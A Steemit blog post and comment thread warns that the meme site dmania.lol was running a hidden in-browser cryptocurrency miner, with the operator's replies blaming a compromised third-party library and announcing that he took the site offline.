Security Warning: Dmania.lol is running mining scripts using your computer resources.

in #dmania7 years ago (edited)

Hey Again Steemitizens,


Edit after a day of this post being up, in fairness:

@zombee responded quickly and fairly decisively and has resolved this issue. Dmania.lol is no longer mining as noted below.

Here from the comments section below, is the result of this post:

[-]zombee (65) · 7 hours ago
I have definitely not installed any mining script on dMania and the site wasn't compromised.
It makes absolutely no sense that I would run a mining script on a small website like dMania. The rewards for that would be almost zero and I would lose all trust of the users.
That would endanger the whole project and everything I have worked for the last 6 months.

The only way that is possible is that some third party library has included a mining script somewhere. I am going to investigate and check if it's true.
dMania uses a lot of libraries that could potentially include a mining script with a new update without my knowledge. That's the only possible explanation and could potentially happen to any website.

Update
Apparently there was actually running a crypto miner on dMania without my knowledge. It was probably included in some external library in one of the last updates. I have updated all external libraries and the miner is gone.

I want to clarify that I had nothing to do with this. Projects like dMania use hundreds of libraries. Those libraries can potentially include a miner in a new update. I am now checking the code for that before every update so that won't happen again.

Update 2

Ok looks like the problem is not resolved. Atm I have no idea whats going on and how the miner gets onto the website. I took down dMania to protect the users until I fix it. ( dMania-bot is also down and won't upvote anything).

dMania will be online again when the problem is resolved.


this is the original post body, before @zombee responded and the addition was made above this line:

You should know that dmania.lol is running crypto mining scripts when you visit their site. Because of the warning issued by my security software, I did not proceed into the site today. This is the first time I have received this warning on their site.

I am not accusing the site operators of mal-doing, but if they are mining surreptitiously, well that's pretty shady. It is possible however, they have been hacked and this script was maliciously injected.

Either way, when this same thing happened to steem.supply, there was massive public outcry when people found out. I feel this bears reporting now to the community as a result.

Yours in service,
@SirCork

Steem Witness #71

Founder @YouAreHOPE Foundation - Steem based, community fueled worldwide humanitarian aid charitable organization.

Founder @SteemStarNetwork 24/7 stream at the center of the steemiverse.


Please remember to cast your witness vote for @SirCork,
your charitable, irritable steem witness!

Sort:  

I have definitely not installed any mining script on dMania and the site wasn't compromised.
It makes absolutely no sense that I would run a mining script on a small website like dMania. The rewards for that would be almost zero and I would lose all trust of the users.
That would endanger the whole project and everything I have worked for the last 6 months.

The only way that is possible is that some third party library has included a mining script somewhere. I am going to investigate and check if it's true.
dMania uses a lot of libraries that could potentially include a mining script with a new update without my knowledge. That's the only possible explanation and could potentially happen to any website.

Update
Apparently there was actually running a crypto miner on dMania without my knowledge. It was probably included in some external library in one of the last updates. I have updated all external libraries and the miner is gone.

I want to clarify that I had nothing to do with this. Projects like dMania use hundreds of libraries. Those libraries can potentially include a miner in a new update. I am now checking the code for that before every update so that won't happen again.

Update 2

Ok looks like the problem is not resolved. Atm I have no idea whats going on and how the miner gets onto the website. I took down dMania to protect the users until I fix it. ( dMania-bot is also down and won't upvote anything).

dMania will be online again when the problem is resolved.

Can you please give more info on which module was adding the miner? Was it a npm module? What's the name? I want to dig deeper in this

Thanks for responding. We have many confirmations it IS mining from @themarkymark, @netuoso, @andybets, @drakos and myself.

Find it and kill it, would be my suggestion.

Dmania is useless why would i share my rewards with your platform when i can just post a meme directly to steemit?

Because there is a chance of a 40$ upvote from the bot that you cant get if you post directly to steemit. But take in consideration that only quality memes can get the votes so you might want to post them to steemit after all. Your attitude is toxic, gtfo.

I find your reply to accra unpleasant and wrong. I too had wondered and now I know I must stay far from all posts using dmania, since you react so violently to a simple question. I suppose you are now going to flag me also...

@zombee does runicar really represent your attitude to questions being asked? I also think that responding this way, with sarcasm and flags, at the time you have just been found to be in the wrong, even if unwittingly, is not good marketing.

You really shouldn’t be using hundreds of libraries. It’s a bit wasteful from a resource standpoint, opens up the site to vulnerabilities, and makes updating a pain.

Thanks for the update. Crisis averted. Good work. Good response.

What virus software do you use? I'm impressed by that catch!

Cg

Avast as indicated in the screenshot. McAfee is already dead because the founder has transformed into a full-time shill. LOL

and you find out here? is making the corrections for this post, I think you should be more careful with this ,,,,, thanks to the friend @ sirirk for such important information ,,,

I appreciate your response and update @zombee, but can you also answer @heimindanger question? Thanks

Here's my little 100% UV
THANKS for the Quick Response!

@sircork

U, MY GOOD SIR, ROCK!

Not buying it, what was it included with?

I am now checking the code for that before every update so that won't happen again.

Will you share some details! So other small operators who care about it can also try to avoid these hidden miners!!

I go with the library theory. It is not the first time I see something like this happen, especially with crypto-related sites. It is vital to have the proper security software installed for detecting this kind of things.

we love you big chef. Let's vote for a party.

Damn @zombee after the bernie post one would think that you would make sure to keep a clean house. I think most DO THINK that you put that there knowingly too. This is not good. You're hurting your existence.

You need to refresh on Dmania.
It's the shanty town of steemit man.

The consensus of most users in these comments is that it's sloppy that it got there, but probably not intentional. That said, it is a case of trust but verify, so we'd still like to know what library and how to avoid this in other applications likely to be using the same libraries for this sort of steem connected site.

You're a good guy @sircock
lol kidding but I swear I thought that was your name at first glance.

And @netuoso you should be clear and let people know that you want @zombee to fail because you present an alternative on the meme creation front. Nothing wrong with wanting your competition to fail but you should be clear on that.

I second the latter paragraph on here. I love meme, reason why I prefer it as an alternative than any other shit posting. Writing on a daily basis without generating a return-of-effort is a soul-crushing experience. I don't care though who will dominate this meme arena as long as it is user-friendly and safe to use. Facebook on the other end is undergoing similar trust issue lately, Dmania should fix this shit because the competition is getting fierce day by day.

Modern-day interpretation to Plato's Allegory Of The Cave is badass.

platonism.jpg

Dmania probably got compromised and some hackers installed these mining scripts. I doubt they would start doing this without letting users know.

I tend to agree.

Yea, that's pretty awful!!

Another rouge witness that hath gone greedy?

hard to say. maybe so, maybe not, but they seem to be responding to the cry to undo it.

Thanks for the info. I tend to believe that they were hacked. With lower prices, I would imagine it would be harder to defend an attack. This dip has left a lot of sites vulnerable. Any update on steem.supply? I really liked their service. Thanks again for the post! Resteem

Steem.supply is clean. I vote for it's operator as a witness myself, in part because of how he handled the pressure of being found with crypto mining scripts last year. The site is devoid of them now.

Thanks for the heads up @sircork! Super helpful

We must have a very good antivirus to get noticed about these. Yesterday I saw a niche way of phishing and made a post about it. Looks like this was introduced unknowingly , but more and more greedy hackers are now eying steem block chain for sure.

Upvoted and Resteemed! Helping get the message out there. Thanks!

there has been A LOT of crazy phishing and bad links/scams and this kinda stuff......thanks @sircork for the warning
for the amount of money that is being 'played' with and the decentralized nature of what most of us stand for then any potential hidden things should be known

GO TEAM GOOD! ;)

Coin Marketplace

STEEM 0.21
TRX 0.20
JST 0.034
BTC 99163.21
ETH 3283.22
USDT 1.00
SBD 3.05